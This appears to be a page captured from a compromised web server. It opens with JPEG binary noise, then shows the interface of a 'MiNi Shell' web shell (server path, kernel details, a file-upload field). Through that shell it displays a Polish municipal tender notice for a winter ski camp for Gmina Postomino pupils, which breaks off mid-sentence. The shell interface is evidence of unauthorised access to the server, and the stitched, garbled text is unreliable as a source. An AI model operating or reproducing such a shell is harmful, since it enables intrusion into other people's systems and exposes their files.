JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241025/0056409201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Organizacja zimowiska dla uczniów szkół podstawowych z terenu Gminy Postomino </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Postomino</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979890</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Postomino 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Postomino</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-113</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@postomino.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.postomino.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Organizacja zimowiska dla uczniów szkół podstawowych z terenu Gminy Postomino </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d8f7d23b-0bae-4c86-a95c-b353f6c38b62</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00564092</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00009785/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Organizacja zimowiska dla uczniów szkół z terenu Gminy Postomino (ferie 2025)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d8f7d23b-0bae-4c86-a95c-b353f6c38b62 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy<br/>e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej.<br/>3. Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej na adres e-mail: zp@postomino.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. 2. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania. 2. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: 1) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub 2) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”). 3. Jeżeli dokumenty elektroniczne,<br/>przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informację stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów<br/>elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/ podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). 5. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści<br/>dokumentów zamówienia wystarczające jest posiadanie tzw. Konta uproszczonego na Platformie e-Zamówienia. 6. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. 7. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). 8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1.	Administratorem Pani/Pana danych osobowych jest Gmina Postomino z siedzibą – Urząd Gminy Postomino, Postomino 30, 76-113 Postomino;<br/>2.	W sprawach z zakresu danych osobowych może Pani/Pan kontaktować się z Inspektorem Ochrony Danych Osobowych. Kontakt może odbyć się drogą elektroniczną na adres e-mail: iod@postomino.pl lub pisemnie na adres Urząd Gminy Postomino, 76-113 Postomino 30, z dopiskiem IOD;<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Organizacja zimowiska dla uczniów szkół podstawowych z terenu Gminy Postomino”,<br/>4.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy Prawo zamówień publicznych (t.j. Dz.U.2024.1320), dalej „ustawa Pzp”; <br/>5.	dane osobowe będą przetwarzane przez czas wskazany w przepisach prawa ze szczególnym uwzględnieniem ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach, Rozporządzenia Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych;<br/>6.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7.	stosowanie do art. 22 RODO w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany;<br/>8.	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana; przy czym w sytuacji, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku Zamawiający może żądać wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego postępowania o udzielenie zamówienia publicznego, <br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników,<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.), <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.25.2024.SS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem zamówienia jest organizacja 8 – dniowego zimowiska (7 noclegów + dojazd), w terminie zaproponowanym przez Wykonawcę mieszczącym się w okresie 1-15 lutego 2025r. (ferie dla województwa zachodniopomorskiego) – dla 50 uczniów szkół podstawowych z terenu Gminy Postomino. Wyjazd z Postomina należy zaplanować w godzinach porannych, dojazd na miejsce wypoczynku wieczorem, rozpoczęcie pobytu w miejscu docelowym od obiadokolacji. Wyjazd powrotny do Postomina należy zaplanować w godzinach porannych, po śniadaniu. 3.2. Zamawiający zastrzega sobie prawo do zmniejszenia liczby uczestników o nie więcej niż 3 osoby (w przypadku losowych zdarzeń uniemożliwiających wyjazd, jak np. nagła choroba itp., w zimowisku będzie uczestniczyć co najmniej 47 uczniów). Ostateczną liczbę uczestników Zamawiający poda Wykonawcy najpóźniej w terminie 3 dni przed rozpoczęciem wypoczynku. Rozliczenie nastąpi na podstawie faktycznej liczby dzieci i młodzieży uczestniczących w zimowisku. Wartością wynagrodzenia będzie iloczyn liczby dzieci faktycznie uczestniczących w wypoczynku i podanej przez Wykonawcę całkowitej ceny brutto za jednego uczestnika.<br/>3.3.	Wypoczynek ma być zorganizowany w atrakcyjnej górskiej miejscowości w Polsce na zasadach określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 30 marca 2016 r. w sprawie wypoczynku dzieci i młodzieży (Dz. U. z 2016 r., poz. 452 z późn. zm.). Dopuszcza się wyjazd za granicę Polski w ramach zaoferowanej wycieczki autokarowej, zwiedzanie w ramach wycieczki może być połączone ze szkoleniem na stoku za granicą, wówczas w dniu wycieczki nie będzie miał zastosowania warunek odległości 20 km miejsca zakwaterowania od stoku. 3.4.	Kwalifikacji uczestników na wypoczynek dokonywać będzie Zamawiający we współpracy z dyrektorami szkół z terenu Gminy Postomino. Wypełnione karty kwalifikacyjne Zamawiający przekaże Wykonawcy. 3.5.W ramach zaoferowanej ceny brutto za jednego uczestnika wypoczynku Wykonawca musi sfinansować koszt pobytu dziecka na zimowisku, w tym: 3.5.1.Przewóz z Postomina i z powrotem do Postomina pod opieką wychowawców. Dowóz ma się odbywać autokarem nowoczesnym, komfortowym, wyposażonym w klimatyzację i toaletę, z zapewnieniem miejsc siedzących wszystkim uczestnikom i wychowawcom. Na miejsce zbiórki autokar podjedzie nie później niż 30 minut przed ustaloną godziną wyjazdu. Autokar będzie obsługiwany przez kierowców posiadających odpowiednie kwalifikacje. Transport może się tylko odbywać autokarem sprawnym, odpowiednio oznakowanym, spełniającym warunki określone w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 r. <br/>w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (t. j. Dz. U. z 2024 r. poz. 502 z późn. zm.). W dniu wyjazdu autokar zostanie poddany kontroli przez policję. <br/>3.5.2.	Zakwaterowanie – w obiekcie murowanym w dobrym stanie technicznym, spełniającym wymagania ochrony przeciwpożarowej, ochrony środowiska oraz warunki higieniczno-sanitarne, określone w przepisach o ochronie przeciwpożarowej, ochronie środowiska i Państwowej Inspekcji Sanitarnej; z terenem wokół ośrodka bezpiecznym, ogrodzonym i oświetlonym. Obiekt ma być usytuowany w bliskiej okolicy stoków narciarskich, na których prowadzone będzie szkolenie narciarskie - max. 20 km trasą samochodową od stoku liczonej według Google Maps. Obiekt ma zapewniać dobre warunki sanitarne: bieżącą ciepłą wodę całą dobę, pokoje maksymalnie 4-osobowe z łazienkami (WC, umywalka, prysznic) z odpowiednim wyposażeniem (szafa ubraniowa z wieszakami, stolik i krzesła oraz szafki osobiste przy łóżkach). Obiekt, w którym zostanie zorganizowane zimowisko posiada stołówkę z zapleczem kuchennym do przygotowywania posiłków. Zgodnie z art. 92c ust. 3 Ustawy o systemie oświaty organizator wypoczynku musi posiadać opinię potwierdzającą spełnianie przez obiekt lub teren wymagań ochrony przeciwpożarowej, wydaną przez właściwego miejscowo komendanta powiatowego (miejskiego) Państwowej Straży Pożarnej. Opinia jest ważna przez okres 3 lat od dnia jej wydania, jeżeli warunki ochrony przeciwpożarowej obiektu lub terenu nie uległy zmianie.<br/>3.5.3.	Wyżywienie – Zamawiający ustala następujący harmonogram dni żywieniowych: Dzień 1: obiadokolacja Dzień 2-7: śniadanie, obiad, kolacja, <br/>Dzień 8: śniadanie, suchy prowiant na podróż powrotną; zgodne z zasadami higieny żywienia określonymi w ustawie z dnia 25 sierpnia 2006 r. <br/>o bezpieczeństwie żywności i żywienia. Posiłki muszą być przygotowane na miejscu z produktów świeżych i wysokiej jakości. Potrawy powinny być lekkostrawne, przygotowane z surowców świeżych, naturalnych, mało przetworzonych, z ograniczoną ilością substancji dodatkowych-konserwujących, zagęszczających, barwiących lub sztucznie aromatyzowanych. Ważna jest estetyka potraw i posiłków.<br/> 3.5.4. Kadrę wypoczynku o kwalifikacjach określonych w ustawie o systemie oświaty (t.j. Dz.U. z 2024 r. poz. 737 z późn. zm.) potwierdzonych odpowiednimi dokumentami, którą stanowić będą: 1)	kierownik wypoczynku - pełniący swoje obowiązki wyłącznie na rzecz zimowiska organizowanego dla uczniów Gminy Postomino, 2)	wychowawcy wypoczynku (minimum 3 wychowawców, tj. 2 grupy do 15 os. oraz 1 grupa 20 os.),3)	inne osoby prowadzące zajęcia podczas wypoczynku, w zależności od programu wypoczynku i realizowanych zajęć – ratownicy, trenerzy i instruktorzy sportu, rekreacji, przewodnicy itd. Każdy organizator wypoczynku dzieci i młodzieży zobowiązany jest wprowadzić Standardy ochrony małoletnich. 3.5.5.	Realizację programu – promującego aktywność sportowo-rekreacyjną oraz integrację wśród dzieci i młodzieży, uwzględniającego: 1)	szkolenie narciarskie. Szkolenie narciarskie ma być prowadzone przez co najmniej 5 dni, w wymiarze co najmniej 4 godzin dziennie pod opieką wykwalifikowanych instruktorów narciarstwa, w liczbie umożliwiającej przeszkolenie całej grupy uczniów biorącej udział w wypoczynku. Wykonawca jest zobowiązany zapewnić każdemu z uczestników sprzęt narciarski: buty oraz narty, z możliwością ich wymiany w razie niedopasowania, uszkodzenia itp. (uczestnicy zimowiska zapewnią sobie kaski ochronne we własnym zakresie). Wykonawca zaopatrzy także każdego uczestnika w skipass umożliwiający korzystanie z urządzeń ośrodka narciarskiego przez cały okres szkolenia (ważny przez 4 godziny, bez limitu zjazdów); 2)	co najmniej 1 wycieczkę autokarową ze zwiedzaniem atrakcji turystycznych regionu (np. zamek, muzeum, kopalnia, kompleks po-militarny itp.) i bezpłatnym wstępem do wszystkich zwiedzanych obiektów, przy czym wycieczka ta nie może się odbywać w dniu przyjazdu i wyjazdu;<br/>3)	co najmniej 1 wycieczkę pieszą ze zwiedzaniem atrakcji turystycznych regionu i bezpłatnym wstępem do wszystkich zwiedzanych obiektów; <br/>4)	co najmniej 1 konkurs (z wyłączeniem konkursu czystości pokoi), <br/>5)	co najmniej 1 ognisko, 6)	inne formy aktywności, np. basen, dyskoteka. <br/>3.5.6.	Koszty ubezpieczenia na czas przejazdu i pobytu na wypoczynku - NNW z narciarstwem, minimalna suma ubezpieczenia 15 000 zł.<br/>3.5.7.	Dostęp do bezpłatnej opieki medycznej (bezpłatna opieka pielęgniarsko–lekarska dla uczestników zimowiska). 3.5.8.	Środki i przybory niezbędne do realizacji zaproponowanego programu. 3.5.9.	Inne artykuły dla dzieci i młodzieży niezbędne w czasie pobytu na wypoczynku (tj. np.: apteczkę wyposażoną w podstawowe leki i artykuły opatrunkowe, itp.).<br/>3.6.	Inne wymagania - Wykonawca zobowiązuje się: 1)	Zapewnić wszelkie warunki bezpieczeństwa i higieny określone odrębnymi przepisami, a w szczególności podczas szkolenia narciarskiego i wędrówek górskich zgodnie z obowiązującymi w tym zakresie przepisami, m.in. zgodnie z ustawą z dnia 18 sierpnia 2011 r. o bezpieczeństwie i ratownictwie w górach i na zorganizowanych terenach narciarskich (t.j. Dz. U. z 2023 r. poz. 1154 z późn. zm.), 2)	Nie pobierać żadnych opłat od uczestników zimowiska, 3)	Zapewnić bezpłatny wstęp do zwiedzanych w czasie wycieczek obiektów oraz autokar w przypadku konieczności dowozu dzieci, 4)	Prowadzić dokumentację rzeczową dotyczącą planowania i realizacji wypoczynku (lista obecności uczestników, dzienniki zajęć, książka pracy, rejestr wypadków i urazów itd.) zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 30 marca 2016 r. w sprawie wypoczynku dzieci i młodzieży (Dz. U. z 2016 r., poz. 452 z późn. zm.) oraz właściwymi przepisami, 5)	Wykonawca ma obowiązek posiadania ubezpieczenia OC, 6)	Wykonawca wypoczynku zobowiązany jest zgłosić wypoczynek do kuratorium oświaty zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 30 marca 2016 r. w sprawie wypoczynku dzieci i młodzieży 